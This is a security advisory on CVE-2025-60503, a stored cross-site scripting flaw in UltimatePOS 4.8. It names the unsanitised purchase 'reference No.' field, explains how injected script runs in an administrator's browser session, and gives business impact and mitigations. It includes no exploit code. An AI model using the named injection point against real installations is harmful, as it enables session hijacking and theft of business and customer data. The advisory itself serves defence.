CVE-2025-60503 is a stored cross-site scripting vulnerability affecting the administrative interface of UltimatePOS version 4.8. The vulnerability arises because input submitted in the purchase functionality, specifically the 'reference No.' field, is not properly sanitized or escaped before being displayed in the admin log panel page. This improper handling allows an authenticated attacker to inject malicious JavaScript code that executes within the context of an administrator's browser session when they view the log panel. The attack vector requires the attacker to have valid credentials to submit purchase data, which is then logged and reflected back to administrators. Successful exploitation can lead to session hijacking, enabling the attacker to impersonate the administrator, access sensitive data, modify system settings, or perform other unauthorized actions. Although no public exploits are currently reported, the vulnerability poses a significant risk due to the high privileges of the targeted users. The lack of a CVSS score indicates this is a newly disclosed issue, and no official patches or mitigations have been documented yet. Organizations using UltimatePOS 4.8 should assume the vulnerability is exploitable and take immediate steps to mitigate risk.

For European organizations, this vulnerability could lead to unauthorized access to administrative functions within UltimatePOS, potentially compromising sensitive business and customer data. Since the attack requires authenticated access, the threat primarily targets insiders or attackers who have obtained valid credentials through phishing or other means. Exploitation could result in session hijacking, allowing attackers to manipulate point-of-sale configurations, alter transaction records, or disrupt business operations. Retailers and businesses relying on UltimatePOS for sales processing are at risk of financial loss, reputational damage, and regulatory non-compliance, especially under GDPR requirements for protecting customer data. The administrative interface compromise could also serve as a foothold for further lateral movement within the organization's network. Given the widespread use of POS systems in European retail sectors, the impact could be significant if not addressed promptly.

Immediate mitigation should focus on restricting access to the administrative interface to trusted personnel only and implementing strong authentication controls such as multi-factor authentication to reduce the risk of credential compromise. Input validation and output encoding should be applied to the 'reference No.' field in the purchase functionality to prevent injection of malicious scripts. Until an official patch is available, organizations can implement web application firewalls (WAFs) with custom rules to detect and block suspicious script payloads in input fields. Regular monitoring of admin logs for unusual entries and administrator session anomalies is recommended. Additionally, educating staff about phishing and credential security can reduce the risk of attackers gaining authenticated access. Organizations should engage with UltimatePOS vendors for timely patch releases and apply updates as soon as they become available. Network segmentation to isolate POS systems and administrative interfaces can further limit potential damage.